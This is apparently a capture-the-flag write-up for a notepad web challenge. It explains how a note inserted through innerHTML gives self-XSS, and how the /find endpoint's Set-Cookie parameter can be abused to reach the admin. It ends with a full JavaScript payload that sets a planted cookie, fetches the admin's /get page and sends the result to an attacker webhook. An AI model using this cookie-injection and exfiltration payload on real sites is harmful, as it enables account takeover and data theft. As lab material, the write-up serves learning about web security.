In this challenge the note of the user is inserted into the HTML document using `innerHTML` and no sanitization is done on the backend. So a user insert arbitrary HTML and get XSS. But this is just a self-XSS. To get XSS on the admin side, we can use the /find api to set a `Set-Cookie` header and use our own cookie on admin. The final payload is
```html

<script>
window.open(`http://chall.notepad1.gq:1111/find?startsWith=d&debug=y&Set-Cookie=id=${cookie}%3B%20path=/get`)
// Set cookie to /get so it doesn't delete existing admin cookie
</script>

<script>
window.open("http://chall.notepad1.gq:1111",name=`document.cookie='id=${cookie}; expires=Thu, 01 Jan 1970 00:00:00 UTC;path=/get;';document.cookie=x;fetch('/get').then(response=>response.text()).then(data=>navigator.sendBeacon('${webhook}',data));`)
// Delete the cookie set by you and then retrieve admin's flag
</script>